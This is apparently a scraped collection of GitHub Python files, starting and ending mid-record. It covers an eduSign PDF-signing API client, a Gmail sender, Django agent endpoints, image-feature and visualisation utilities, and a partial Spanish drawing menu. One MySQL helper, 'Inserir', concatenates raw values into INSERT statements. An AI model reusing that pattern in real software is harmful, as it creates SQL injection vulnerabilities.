{\"signerAttributes\": [ {\"name\" : \"urn:oid:2.16.840.1.113730.3.1.241\"} ]},\n \"fieldValues\": {\"idp\": \"Snake Oil Co\"},\n },\n \"failWhenSignPageFull\": true,\n \"insertPageAt\": 0,\n \"returnDocumentReference\": true,\n },\n }\n\n :param document: Dict holding the PDF (data and metadata) to prepare for signing.\n :return: Flask representation of the HTTP response from the API.\n \"\"\"\n idp = session['idp']\n if self.config['ENVIRONMENT'] == 'development':\n # This is only to test the app in a development environment.\n idp = self.config['DEBUG_IDP']\n\n if session.get('organizationName', None) is not None:\n idp = session['organizationName']\n\n attrs = [{'name': attr} for attr in self.config['SIGNER_ATTRIBUTES'].keys()]\n current_app.logger.debug(f\"signerAttributes sent to the prepare endpoint: {attrs}\")\n\n doc_data = document['blob']\n if ',' in doc_data:\n doc_data = doc_data.split(',')[1]\n\n request_data = {\n \"pdfDocument\": doc_data,\n \"signaturePagePreferences\": {\n \"visiblePdfSignatureUserInformation\": {\n \"signerName\": {\"signerAttributes\": attrs},\n \"fieldValues\": {\"idp\": idp},\n },\n \"failWhenSignPageFull\": True,\n \"insertPageAt\": 0,\n \"returnDocumentReference\": True,\n },\n }\n api_url = urljoin(self.api_base_url, f'prepare/{self.profile}')\n\n response = self._post(api_url, request_data)\n\n if current_app.logger.level == 'DEBUG':\n tolog = response.copy()\n for doc in tolog['signedDocuments']:\n doc['signedContent'] = doc['signedContent'][:20] + '...'\n current_app.logger.debug(f\"Data returned from the API's prepare endpoint: {pformat(tolog)}\")\n\n return response\n\n def _try_creating_sign_request(self, documents: list, add_blob=False) -> tuple:\n \"\"\"\n Send request to the `create` endpoint of the API.\n This API method is used to create a sign request that can then be POSTed\n to the signature service, to initiate the actual signing process.\n\n It will include references to all the already prepared documents that\n need to be signed, kept in the API's cache.\n\n The main pieces of data we have to send to this endpoint are:\n\n + correlationId: A unique identifier for this request to create a sign request.\n\n + signRequesterID: is the SAML entityID of the SAML SP that authenticated the user,\n and who is the requesting entity of the signature operation. 
It has to coincide with\n          whatever has been configured in the signature service.\n\n        + returnUrl: The URL of the callback endpoint in the client, to which the user\n          will be redirected after completing the signature process at the sign service.\n\n        + authnRequirements.authnServiceID: entityID of the IdP that will perform the authentication\n          for signature.\n\n        + authnRequirements.authnContextClassRefs: The AuthnContextClassRef URI(s) that we request\n          that the user is authenticated under.\n\n        + authnRequirements.requestedSignerAttributes: A list of SAML attributes and values.\n          It is necessary to provide values for all attributes previously sent as signerAttributes\n          to the `prepare` endpoint.\n\n        + tbsDocuments: A list in which each item carries metadata about one of the documents to be signed.\n          The metadata is as follows:\n\n          + tbsDocuments.N.id: A unique identifier for the document issued by the client.\n\n          + tbsDocuments.N.contentReference: This value was in the response from the API to the call\n            to the `prepare` endpoint, as `updatedPdfDocumentReference`.\n\n          + tbsDocuments.N.mimeType: application/pdf\n\n          + tbsDocuments.N.visiblePdfSignatureRequirement: This was also in the response from the API\n            to the call to the `prepare` endpoint.\n\n        So the structure of the JSON to send would be something like:\n\n        {\n            \"correlationId\": \"11111111-1111-1111-1111-111111111111\",\n            \"signRequesterID\": \"https://example.org/shibboleth\",\n            \"returnUrl\": \"https://example.org/callback\",\n            \"authnRequirements\": {\n                \"authnServiceID\": \"https://idp.example.org/shibboleth\",\n                \"authnContextClassRefs\": [ \"http://id.elegnamnden.se/loa/1.0/loa3\" ],\n                \"requestedSignerAttributes\": [\n                    {\n                        \"name\": \"urn:oid:2.16.840.1.113730.3.1.241\",\n                        \"value\": \"John Doe\",\n                    }\n                ],\n            },\n            \"tbsDocuments\": [],\n        }\n\n        And each item in `tbsDocuments` would have the structure:\n\n        {\n            \"id\": \"22222222-2222-2222-2222-222222222222\",\n            \"contentReference\": \"33333333-3333-3333-3333-333333333333\",\n            \"mimeType\": \"application/pdf\",\n            \"visiblePdfSignatureRequirement\": { \"...\" },\n        }\n\n        :param documents: List with (already prepared) documents to include in the sign request.\n        :return: Pair of Flask representation of the HTTP response from the API,\n            and list of mappings linking the documents' names with the generated ids.\n        \"\"\"\n        idp = session['idp']\n        if self.config['ENVIRONMENT'] == 'development':\n            idp = self.config['DEBUG_IDP']\n\n        authn_context = get_authn_context(documents)\n\n        correlation_id = str(uuid.uuid4())\n        return_url = url_for('edusign.sign_service_callback', _external=True, _scheme='https')\n        attrs = [{'name': attr, 'value': session[name]} for attr, name in self.config['SIGNER_ATTRIBUTES'].items()]\n\n        request_data = {\n            \"correlationId\": correlation_id,\n            \"signRequesterID\": self.config['SIGN_REQUESTER_ID'],\n            \"returnUrl\": return_url,\n            \"authnRequirements\": {\n                \"authnServiceID\": idp,\n                \"authnContextClassRefs\": authn_context,\n                \"requestedSignerAttributes\": attrs,\n            },\n            \"tbsDocuments\": [],\n        }\n        documents_with_id = []\n        for document in documents:\n            doc_with_id = {'name': document['name'], 'key': str(document['key'])}\n            if add_blob:\n                doc_with_id['blob'] = document['blob']\n            doc_with_id['size'] = document['size']\n            doc_with_id['type'] = document['type']\n            documents_with_id.append(doc_with_id)\n            request_data['tbsDocuments'].append(\n                {\n                    \"id\": str(document['key']),\n                    \"contentReference\": document['ref'],\n                    \"mimeType\": 
document['type'],\n \"visiblePdfSignatureRequirement\": json.loads(document['sign_requirement']),\n }\n )\n api_url = urljoin(self.api_base_url, f'create/{self.profile}')\n\n return self._post(api_url, request_data), documents_with_id\n\n def create_sign_request(self, documents: list, add_blob=False) -> tuple:\n \"\"\"\n Use the `_try_creating_sign_request` method to create a sign request\n at the `create` endpoint of the API.\n\n It is possible that the documents referenced in the requests have been cleared from\n the API's cache; in that case, the response from the API will have an error code\n indicating that condition. This method will then raise an `ExpiredCache` eception,\n and it is the responsability of the calling method to restart the process: Send the\n documents again to be prepared, and then try again to create a sign request.\n\n If successful, this method will return the response with the sign request, to be POSTed\n from the user agent to initiate the actual signing of the document.\n\n :param documents: List with (already prepared) documents to include in the sign request.\n :raises ExpiredCache: When the response from the API indicates that the documents to sign\n have dissapeared from the API's cache.\n :return: Data (with the sign request) contained in the response from the API,\n and a list of mappings linking the documents' names with the generated ids (sent to\n the API as tbsDocuments.N.id).\n \"\"\"\n response_data, documents_with_id = self._try_creating_sign_request(documents, add_blob=add_blob)\n\n if (\n 'status' in response_data\n and response_data['status'] == 400\n and 'message' in response_data\n and 'not found in cache' in response_data['message']\n ):\n\n raise self.ExpiredCache()\n\n if current_app.logger.level == 'DEBUG':\n tolog = response_data.copy()\n tolog['signRequest'] = tolog['signRequest'][:20] + '...'\n current_app.logger.debug(f\"Data returned from the API's create endpoint: {pformat(tolog)}\")\n\n return response_data, documents_with_id\n\n def process_sign_request(self, sign_response: dict, relay_state: str) -> requests.Response:\n \"\"\"\n This method is meant to be called after the user has completed the sgnature process, through the\n sign service and the IdP. 
At this point, the documents are signed and kept in the API's cache.\n So here we send a request to the `proccess` endpoint of the API to retrieve them.\n\n The main pieces of data we have to send to this endpoint are:\n\n + signResponse\n + realyState\n + state\n\n The values for these are all present in the POST that the user agent sends to the callback in the client app\n (whose URL we sent to the `create` endpoint as `returnUrl`), after returning from the sign service and IdP.\n\n The reponse to this call will contain, in addition to some more metadata, the signed documents, in a list\n `signedDocuments`, where each document includes:\n\n + id: the id of the document, sent to the `create` endpoint as tbsDocuments.N.id;\n + signedContent: The signed document encoded as base64;\n + mimeType: \"application/pdf\"\n\n Send request to the `process` endpoint of the API.\n This API method will process the DSS SignRequest in order to get the signed document.\n\n :param sign_response: signResponse data as returned from the `create` endpoint of the eduSign API.\n :param relay_state: Relay state as returned from the `create` endpoint of the eduSign API.\n :return: Data (containing the signed documents in successful requests) received in the HTTP response\n from the API.\n \"\"\"\n request_data = {\"signResponse\": sign_response, \"relayState\": relay_state, \"state\": {\"id\": relay_state}}\n api_url = urljoin(self.api_base_url, 'process')\n\n response = self._post(api_url, request_data)\n\n if current_app.logger.level == 'DEBUG':\n tolog = response.copy()\n for doc in tolog['signedDocuments']:\n doc['signedContent'] = doc['signedContent'][:20] + '...'\n current_app.logger.debug(f\"Data returned from the API's process endpoint: {pformat(tolog)}\")\n\n return response\n","repo_name":"SUNET/edusign-app","sub_path":"backend/src/edusign_webapp/api_client.py","file_name":"api_client.py","file_ext":"py","file_size_in_byte":16468,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"}
+{"seq_id":"26121963505","text":"__author__ = 'hungtantran'\r\n\r\n\r\nimport httplib2\r\nimport os\r\nimport base64\r\nfrom email.mime.text import MIMEText\r\n\r\nfrom apiclient import discovery\r\nimport oauth2client\r\nfrom oauth2client import client\r\nfrom oauth2client import tools\r\n\r\nfrom constants_config import Config\r\nimport logger\r\n\r\ntry:\r\n import argparse\r\n flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()\r\nexcept ImportError:\r\n flags = None\r\n\r\n\r\nclass GmailClient(object):\r\n SCOPES = 'https://www.googleapis.com/auth/gmail.modify'\r\n APPLICATION_NAME = 'gmail_client'\r\n\r\n def __init__(self, secret_json, user_id):\r\n self.secret_json = secret_json\r\n self.user_id = user_id\r\n\r\n credentials = self.get_credentials(secret_json)\r\n http = credentials.authorize(httplib2.Http())\r\n self.service = discovery.build('gmail', 'v1', http=http)\r\n\r\n def get_credentials(self, secret_json):\r\n \"\"\"Gets valid user credentials from storage.\r\n\r\n If nothing has been stored, or if the stored credentials are invalid,\r\n the OAuth2 flow is completed to obtain the new credentials.\r\n\r\n Returns:\r\n Credentials, the obtained credential.\r\n \"\"\"\r\n credential_dir = os.path.join('.credentials')\r\n if not os.path.exists(credential_dir):\r\n os.makedirs(credential_dir)\r\n credential_path = os.path.join(credential_dir, 'secret.json')\r\n\r\n store = oauth2client.file.Storage(credential_path)\r\n credentials = store.get()\r\n if not credentials or credentials.invalid:\r\n flow = client.flow_from_clientsecrets(secret_json, GmailClient.SCOPES)\r\n flow.user_agent = GmailClient.APPLICATION_NAME\r\n if flags:\r\n credentials = tools.run_flow(flow, store, flags)\r\n else: # Needed only for compatibility with Python 2.6\r\n credentials = tools.run(flow, store)\r\n return credentials\r\n\r\n def CreateMessage(self, content, subject, toLine, ccLine=None, bccLine=None):\r\n \"\"\"Create a message for an email.\r\n\r\n Args:\r\n sender: Email address of the sender.\r\n to: Email address of the receiver.\r\n subject: The subject of the email message.\r\n message_text: The text of the email message.\r\n\r\n Returns:\r\n An object containing a base64url encoded email object.\r\n \"\"\"\r\n message = MIMEText(content)\r\n message['to'] = toLine\r\n\r\n if ccLine is not None:\r\n message['cc'] = ccLine\r\n\r\n if bccLine is not None:\r\n message['bcc'] = bccLine\r\n\r\n message['from'] = Config.gmail_client_userid\r\n message['subject'] = subject\r\n return {'raw': base64.urlsafe_b64encode(message.as_string())}\r\n\r\n def send_mail(self, content, subject, toLine, ccLine=None, bccLine=None):\r\n \"\"\"Send an email message.\r\n\r\n Args:\r\n service: Authorized Gmail API service instance.\r\n user_id: User's email address. 
The special value \"me\"\r\n can be used to indicate the authenticated user.\r\n message: Message to be sent.\r\n\r\n Returns:\r\n Sent Message.\r\n \"\"\"\r\n try:\r\n logger.Logger.log(logger.LogLevel.INFO, 'Try sending message with subject %s to %s' % (subject, toLine))\r\n message = self.CreateMessage(content, subject, toLine, ccLine, bccLine)\r\n message = (self.service.users().messages().send(userId=self.user_id,\r\n body=message).execute())\r\n logger.Logger.log(logger.LogLevel.INFO, 'Sent message id: %s' % message['id'])\r\n return message\r\n except Exception as e:\r\n logger.Logger.log(logger.LogLevel.ERROR, e)\r\n\r\n\r\n","repo_name":"hungtantran/Findata","sub_path":"Common/gmail_client.py","file_name":"gmail_client.py","file_ext":"py","file_size_in_byte":3764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"1373699957","text":"import random\nfrom color import color\nclass RandomColor():\n def __init__(self, screen_array):\n self.screen_array = screen_array\n\n def randomColor(self):\n return color(random.randint(0, 2), random.randint(0, 2), random.randint(0, 2))\n\n def randomColorFill(self, x, y, x2, y2,types='two_ang'):\n if types == 'two_ang':\n for i in range(x2-x):\n for j in range(y2-y):\n self.screen_array[i+x][j+y] = self.randomColor()\n if types == 'one_ang':\n for i in range(x2):\n for j in range(y2):\n self.screen_array[i+x][j+y] = self.randomColor()\n\n def randomOneColorFill(self, x, y, x2, y2,types='two_ang'):\n random_color = self.randomColor()\n if types == 'two_ang':\n for i in range(x2-x):\n for j in range(y2-y):\n self.screen_array[i+x][j+y] = random_color\n if types == 'one_ang':\n for i in range(x2):\n for j in range(y2):\n self.screen_array[i+x][j+y] = random_color","repo_name":"lllzebralll/TGL","sub_path":"randomColor.py","file_name":"randomColor.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"40057820614","text":"from query_builder import QueryBuilder\nfrom connect_mysql import Conexao\nfrom mysql.connector import Error\n\nclass Inserir(QueryBuilder):\n def __init__(self,table,data):\n super().__init__(table,data)\n self.conn = Conexao()\n\n def _sql(self):\n key = self._dados_chave()\n valor = self._dados_valores()\n campos = \",\".join(key)\n valores = \"','\".join(valor)\n sql = \"INSERT INTO \" + self._tabela + \" (\" + campos + \") VALUES ('\" + valores + \"');\"\n\n return sql\n\n def get(self):\n try:\n sql = self._sql()\n conn = self.conn.connection()\n cursor = conn.cursor()\n cursor.execute(sql)\n conn.commit()\n print(f'{cursor.rowcount} linha(s) afetada(s)')\n cursor.close()\n except Error as erro:\n print(f'Falha ao inserir dados ao banco {erro}')\n finally:\n if (conn.is_connected()):\n conn.close()\n print(\"conexao finalizada\")","repo_name":"wellz3280/estudos-python","sub_path":"query_builder/inserir.py","file_name":"inserir.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"34022533848","text":"from asgiref.sync import sync_to_async\nfrom django.contrib.auth.models import AbstractUser\nfrom django.db.models import Q\nfrom fastapi import HTTPException, APIRouter, Depends\nfrom typing import Optional\nfrom pydantic import BaseModel\nfrom uuid import UUID\nfrom ix.agents.models import Agent\nfrom ix.api.auth import get_request_user\nfrom ix.api.chains.endpoints import DeletedItem\nfrom ix.api.agents.types import Agent as AgentPydantic, AgentPage\n\n__all__ = [\"router\", \"AgentCreateUpdate\"]\n\n\nrouter = APIRouter()\n\n\nclass AgentCreateUpdate(BaseModel):\n name: str\n alias: str\n purpose: str\n chain_id: UUID\n model: str = \"gpt-4\"\n config: dict = {}\n\n\n@router.post(\"/agents/\", response_model=AgentPydantic, tags=[\"Agents\"])\nasync def create_agent(\n agent: AgentCreateUpdate, user: AbstractUser = Depends(get_request_user)\n):\n agent_obj = Agent(user=user, **agent.dict())\n await agent_obj.asave()\n return AgentPydantic.from_orm(agent_obj)\n\n\n@router.get(\"/agents/{agent_id}\", response_model=AgentPydantic, tags=[\"Agents\"])\nasync def get_agent(agent_id: str, user: AbstractUser = Depends(get_request_user)):\n try:\n query = Agent.objects.filter(pk=agent_id)\n agent = await Agent.filter_owners(user, query).aget()\n except Agent.DoesNotExist:\n raise HTTPException(status_code=404, detail=\"Agent not found\")\n return AgentPydantic.from_orm(agent)\n\n\n@router.get(\"/agents/\", response_model=AgentPage, tags=[\"Agents\"])\nasync def get_agents(\n search: Optional[str] = None,\n chat_id: Optional[UUID] = None,\n limit: int = 10,\n offset: int = 0,\n user: AbstractUser = Depends(get_request_user),\n):\n query = Agent.objects.filter(is_test=False).order_by(\"alias\")\n query = Agent.filter_owners(user, query)\n if chat_id:\n query = query.filter(chats__id=chat_id)\n if search:\n query = query.filter(Q(name__icontains=search) | Q(alias__icontains=search))\n\n # punting on async implementation of pagination until later\n return await sync_to_async(AgentPage.paginate)(\n output_model=AgentPydantic, queryset=query, limit=limit, offset=offset\n )\n\n\n@router.put(\"/agents/{agent_id}\", response_model=AgentPydantic, tags=[\"Agents\"])\nasync def update_agent(\n agent_id: str,\n agent: AgentCreateUpdate,\n user: AbstractUser = Depends(get_request_user),\n):\n try:\n query = Agent.objects.filter(pk=agent_id)\n agent_obj = await Agent.filter_owners(user, query).aget()\n except Agent.DoesNotExist:\n raise HTTPException(status_code=404, detail=\"Agent not found\")\n for attr, value in agent.dict().items():\n setattr(agent_obj, attr, value)\n await agent_obj.asave()\n return agent_obj\n\n\n@router.delete(\"/agents/{agent_id}\", response_model=DeletedItem, tags=[\"Agents\"])\nasync def delete_agent(agent_id: str, user: AbstractUser = Depends(get_request_user)):\n try:\n query = Agent.objects.filter(pk=agent_id)\n agent = await Agent.filter_owners(user, query).aget()\n except Agent.DoesNotExist:\n raise HTTPException(status_code=404, detail=\"Agent not found\")\n await agent.adelete()\n return DeletedItem(id=agent_id)\n","repo_name":"kreneskyp/ix","sub_path":"ix/api/agents/endpoints.py","file_name":"endpoints.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","stars":809,"dataset":"github-code","pt":"18"}
+{"seq_id":"29908103607","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# coding:utf-8\n\nimport numpy as np\nimport cv2 as cv\ntry:\n import cPickle as pickle\nexcept ModuleNotFoundError:\n import _pickle as pickle\nfrom chainer import cuda\nfrom chainer import Variable\n\n\ndef vggparamater(image, gpu, vgg): # image:str(path to image file) gpu:number(gpu-id)\n\n mean = np.array([103.939, 116.779, 123.68])\n img = cv.imread(image).astype(np.float32)\n img -= mean\n img = cv.resize(img, (224, 224)).transpose((2, 0, 1))\n img = img[np.newaxis, :, :, :]\n\n if gpu >= 0:\n cuda.get_device(gpu).use()\n vgg.to_gpu()\n img = cuda.cupy.asarray(img, dtype=np.float32)\n\n pred = vgg(Variable(img), None)\n\n if gpu >= 0:\n pred = cuda.to_cpu(pred.data)\n else:\n pred = pred.data\n\n with open('pca.pickle', mode='rb') as f:\n pca = pickle.load(f, encoding='latin1')\n\n result = pca.transform(pred)\n\n # PCAmean = np.load('PCAmean.npy')\n # PCAeigen = np.load('PCAeigen.npy')\n\n # result = cv2.PCAProject(pred,PCAmean,PCAeigen)\n\n # print np.shape(result)\n return result\n # return pred\n","repo_name":"sugiya-y/StyleTransferWords","sub_path":"arbitrary_image_stylization_word/vggparam.py","file_name":"vggparam.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"26911717909","text":"import torch\nimport cv2\nimport numpy as np\nimport torch.nn.functional as F\nimport os\nimport os.path as osp\n\n_COLORS = np.array(\n [\n 0.000, 0.447, 0.741,\n 0.850, 0.325, 0.098,\n 0.929, 0.694, 0.125,\n 0.494, 0.184, 0.556,\n 0.466, 0.674, 0.188,\n 0.301, 0.745, 0.933,\n 0.635, 0.078, 0.184,\n 0.300, 0.300, 0.300,\n 1.000, 0.667, 0.500,\n 1.000, 1.000, 0.500,\n 0.000, 0.333, 1.000,\n 0.000, 0.667, 1.000,\n 0.000, 1.000, 1.000,\n 0.333, 0.000, 1.000,\n 0.333, 0.333, 1.000,\n 0.333, 0.667, 1.000,\n 0.333, 1.000, 1.000,\n 0.667, 0.000, 1.000,\n 0.667, 0.333, 1.000\n ]\n).astype(np.float32).reshape(-1, 3)\n\ndef get_names_dict(model):\n \"\"\"Recursive walk to get names including path.\"\"\"\n names = {}\n\n def _get_names(module, parent_name=\"\"):\n for key, m in module.named_children():\n cls_name = str(m.__class__).split(\".\")[-1].split(\"'\")[0]\n num_named_children = len(list(m.named_children()))\n if num_named_children > 0:\n name = parent_name + \".\" + key if parent_name else key\n else:\n name = parent_name + \".\" + cls_name + \"_\" + key if parent_name else key\n names[name] = m\n\n if isinstance(m, torch.nn.Module):\n _get_names(m, parent_name=name)\n\n _get_names(model)\n return names\n\ndef show_img(imgs, window_names=None, wait_time_ms=0, is_merge=False, row_col_num=(1, -1)):\n \"\"\"\n Displays an image or a list of images in specified windows or self-initiated windows.\n You can also control display wait time by parameter 'wait_time_ms'.\n Additionally, this function provides an optional parameter 'is_merge' to\n decide whether to display all imgs in a particular window 'merge'.\n Besides, parameter 'row_col_num' supports user specified merge format.\n Notice, specified format must be greater than or equal to imgs number.\n\n :param imgs: numpy.ndarray or list.\n :param window_names: specified or None, if None, function will create different windows as '1', '2'.\n :param wait_time_ms: display wait time.\n :param is_merge: whether to merge all images.\n :param row_col_num: merge format. 
default is (1, -1), image will line up to show.\n        example=(2, 5), images will display in two rows and five columns.\n    \"\"\"\n    if not isinstance(imgs, list):\n        imgs = [imgs]\n\n    if window_names is None:\n        window_names = list(range(len(imgs)))\n    else:\n        if not isinstance(window_names, list):\n            window_names = [window_names]\n        assert len(imgs) == len(window_names), 'window names do not match images!'\n\n    if is_merge:\n        merge_imgs1 = merge_imgs(imgs, row_col_num)\n\n        cv2.namedWindow('merge', 0)\n        cv2.imshow('merge', merge_imgs1)\n    else:\n        for img, win_name in zip(imgs, window_names):\n            if img is None:\n                continue\n            win_name = str(win_name)\n            cv2.namedWindow(win_name, 0)\n            cv2.imshow(win_name, img)\n\n    cv2.waitKey(wait_time_ms)\n\ndef merge_imgs(imgs, row_col_num):\n    \"\"\"\n    Merges all input images as an image with specified merge format.\n\n    :param imgs : img list\n    :param row_col_num : number of rows and columns displayed\n    :return img : merges img\n    \"\"\"\n\n    length = len(imgs)\n    row, col = row_col_num\n\n    assert row > 0 or col > 0, 'row and col cannot be negative at same time!'\n    color = random_color(rgb=True).astype(np.float64)\n\n    for img in imgs:\n        cv2.rectangle(img, (0, 0), (img.shape[1], img.shape[0]), color)\n\n    if row_col_num[1] < 0 or length < row:\n        merge_imgs = np.hstack(imgs)\n    elif row_col_num[0] < 0 or length < col:\n        merge_imgs = np.vstack(imgs)\n    else:\n        assert row * col >= length, 'Imgs overboundary, not enough windows to display all imgs!'\n\n        fill_img_list = [np.zeros(imgs[0].shape, dtype=np.uint8)] * (row * col - length)\n        imgs.extend(fill_img_list)\n        merge_imgs_col = []\n        for i in range(row):\n            start = col * i\n            end = col * (i + 1)\n            merge_col = np.hstack(imgs[start: end])\n            merge_imgs_col.append(merge_col)\n\n        merge_imgs = np.vstack(merge_imgs_col)\n\n    return merge_imgs\n\ndef show_tensor(tensor, resize_hw=None, top_k=50, mode='CHW', is_show=True,\n                wait_time_ms=0, show_split=True, is_merge=True, row_col_num=(1, -1)):\n    \"\"\"\n\n    :param wait_time_ms:\n    :param tensor: torch.tensor\n    :param resize_hw: list:\n    :param top_k: int\n    :param mode: string: 'CHW' , 'HWC'\n    \"\"\"\n\n    def normalize_numpy(array):\n        max_value = np.max(array)\n        min_value = np.min(array)\n        array = (array - min_value) / (max_value - min_value)\n        return array\n\n    assert tensor.dim() == 3, 'Dim of input tensor should be 3, please check your tensor dimension!'\n\n    # the default tensor layout is channel-first\n    if mode == 'CHW':\n        tensor = tensor\n    else:\n        tensor = tensor.permute(2, 0, 1)\n\n    # resize with torch's interpolate, choosing bilinear interpolation for smoothness\n    if resize_hw is not None:\n        tensor = tensor[None]\n        tensor = F.interpolate(tensor, resize_hw, mode='bilinear')\n        tensor = tensor.squeeze(0)\n\n    tensor = tensor.permute(1, 2, 0)\n\n    channel = tensor.shape[2]\n\n    if tensor.device == 'cpu':\n        tensor = tensor.detach().numpy()\n    else:\n        tensor = tensor.cpu().detach().numpy()\n    if not show_split:\n        # the summed map can exceed the display range, so normalize it\n        sum_tensor = np.sum(tensor, axis=2)\n        sum_tensor = normalize_numpy(sum_tensor) * 255\n        sum_tensor = sum_tensor.astype(np.uint8)\n\n        # render as a heatmap\n        sum_tensor = cv2.applyColorMap(np.uint8(sum_tensor), cv2.COLORMAP_JET)\n        # mean_tensor = cv2.applyColorMap(np.uint8(mean_tensor), cv2.COLORMAP_JET)\n\n        if is_show:\n            show_img([sum_tensor], ['sum'], wait_time_ms=wait_time_ms)\n        return [sum_tensor]\n    else:\n        assert top_k > 0, 'top k should be positive!'\n        channel_sum = np.sum(tensor, axis=(0, 1))\n        index = np.argsort(channel_sum)\n        select_index = index[:top_k]\n        tensor = tensor[:, :, select_index]\n        tensor = np.clip(tensor, 0, np.max(tensor))\n\n        
single_tensor_list = []\n if top_k > channel:\n top_k = channel\n for c in range(top_k):\n single_tensor = tensor[..., c]\n single_tensor = normalize_numpy(single_tensor) * 255\n single_tensor = single_tensor.astype(np.uint8)\n\n single_tensor = cv2.applyColorMap(np.uint8(single_tensor), cv2.COLORMAP_JET)\n single_tensor_list.append(single_tensor)\n\n if is_merge:\n return_imgs = merge_imgs(single_tensor_list, row_col_num=row_col_num)\n else:\n return_imgs = single_tensor_list\n\n if is_show:\n show_img(return_imgs, wait_time_ms=wait_time_ms, is_merge=is_merge)\n return return_imgs\n\ndef random_color(rgb=False, maximum=255):\n \"\"\"\n Args:\n rgb (bool): whether to return RGB colors or BGR colors.\n maximum (int): either 255 or 1\n\n Returns:\n ndarray: a vector of 3 numbers\n \"\"\"\n idx = np.random.randint(0, len(_COLORS))\n ret = _COLORS[idx] * maximum\n if not rgb:\n ret = ret[::-1]\n return ret\n\ndef imdenormalize(img, mean, std, to_bgr=True):\n assert img.dtype != np.uint8\n mean = mean.reshape(1, -1).astype(np.float64)\n std = std.reshape(1, -1).astype(np.float64)\n img = cv2.multiply(img, std) # make a copy\n cv2.add(img, mean, img) # inplace\n if to_bgr:\n cv2.cvtColor(img, cv2.COLOR_RGB2BGR, img) # inplace\n return img\n\ndef imwrite(img, file_path, params=None, auto_mkdir=True):\n \"\"\"Write image to file.\n\n Args:\n img (ndarray): Image array to be written.\n file_path (str): Image file path.\n params (None or list): Same as opencv's :func:`imwrite` interface.\n auto_mkdir (bool): If the parent folder of `file_path` does not exist,\n whether to create it automatically.\n\n Returns:\n bool: Successful or not.\n \"\"\"\n if auto_mkdir:\n dir_name = osp.abspath(osp.dirname(file_path))\n mkdir_or_exist(dir_name)\n return cv2.imwrite(file_path, img, params)\n\ndef mkdir_or_exist(dir_name, mode=0o777):\n if dir_name == '':\n return\n dir_name = osp.expanduser(dir_name)\n os.makedirs(dir_name, mode=mode, exist_ok=True)\n\ndef traverse_file_paths(path, extensions, exclude_extensions=None):\n \"\"\"\n Recursively reads all files under given folder, until all files have been ergodic.\n You can also specified file extensions to read or not to read.\n :return: list: path_list contains all wanted files.\n \"\"\"\n\n def is_valid_file(x):\n if exclude_extensions is None:\n return x.lower().endswith(extensions)\n else:\n return x.lower().endswith(extensions) and not x.lower().endswith(exclude_extensions)\n\n # check_file_exist(path)\n if isinstance(extensions, list):\n extensions = tuple(extensions)\n if isinstance(exclude_extensions, list):\n exclude_extensions = tuple(exclude_extensions)\n\n all_list = os.listdir(path)\n path_list = []\n for subpath in all_list:\n path_next = os.path.join(path, subpath)\n if os.path.isdir(path_next):\n path_list.extend(traverse_file_paths(path_next, extensions, exclude_extensions))\n else:\n if is_valid_file(path_next):\n path_list.append(path_next)\n return path_list","repo_name":"HUST-OROP/CopperDefect","sub_path":"utils/tools/feature_map_visual/mmdet_mini/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9776,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"}
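A minimal usage sketch for show_tensor above (requires a local display for the cv2 windows; the feature map is random):

import torch

fmap = torch.rand(16, 32, 32)  # C, H, W feature map
# split view: top 8 channels as heatmaps, arranged in a 2x4 grid
show_tensor(fmap, resize_hw=(128, 128), top_k=8, row_col_num=(2, 4))
# fused view: a single heatmap of the channel-wise sum
show_tensor(fmap, resize_hw=(128, 128), show_split=False)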
+{"seq_id":"4826425247","text":"import os\r\ndef cerrarprograma():\r\n os.system(\"clear\")\r\n\r\ntabla = []\r\nalto = 82\r\ncont1=0\r\nlargo = 42\r\nfor x in range(largo):\r\n for y in range(alto):\r\n if x == 0 or x == largo - 1:\r\n tabla.append(\".\")\r\n elif y == 0 or y == alto - 1:\r\n tabla.append(\".\")\r\n else:\r\n tabla.append(\" \")\r\n matriz= ''.join(tabla)\r\n print(matriz)\r\n tabla=[]\r\nprint(\"MENU\")\r\nprint()\r\nprint(\"1.Agregar una línea\")\r\nprint()\r\nprint(\"2.Agregar una elipse o círculo\")\r\nprint()\r\nprint(\"3.Agregar un rectángulo o cuadrado\")\r\nprint()\r\nprint(\"4.Agregar un triángulo\")\r\nprint()\r\nprint(\"5.Mostrar un Dibujo\")\r\nprint()\r\nprint(\"6.Leer un dibujo\")\r\nprint()\r\nprint(\"7.Grabar un dibujo\")\r\nprint()\r\nprint(\"0.Cerrar programa\")\r\nprint()\r\nn = int(input(\"Selecciona una opción: \"))\r\nif n==0:\r\n cerrarprograma()\r\nif n == 1:\r\n print(\"Por el momento solo funciona en diagonales con punto x y punto y iguales. Próximamente mejorará.\")\r\n x1 = int(input(\"¿Cuál es el x del primer punto?: \"))\r\n while not -1 < x1 < 83:\r\n print(\"Ha escrito un valor inválido para la línea. Escriba de nuevo\")\r\n x1 = int(input(\"¿Cuál es el primer punto?: \"))\r\n print(\"Listo\")\r\n y1 = int(input(\"¿Cuál es el y del primer punto?: \"))\r\n while not -1 < y1 < 43 :\r\n print(\"Ha escrito un valor inválido para la línea. Escriba de nuevo\")\r\n y1 = int(input(\"¿Cuál es el y del primer punto?: \"))\r\n print(\"Listo\")\r\n x2 = int(input(\"¿Cuál es el x del segundo punto?: \"))\r\n while not -1 < x2 < 83 :\r\n print(\"Ha escrito un valor inválido para la línea. Escriba de nuevo\")\r\n x2 = int(input(\"¿Cuál es el x del segundo punto?: \"))\r\n print(\"Listo\")\r\n y2 = int(input(\"¿Cuál es el y del segundo punto?: \"))\r\n while not -1 < y2 < 43 :\r\n print(\"Ha escrito un valor inválido para la línea. Escriba de nuevo\")\r\n y2 = int(input(\"¿Cuál es el y del segundo punto?: \"))\r\n 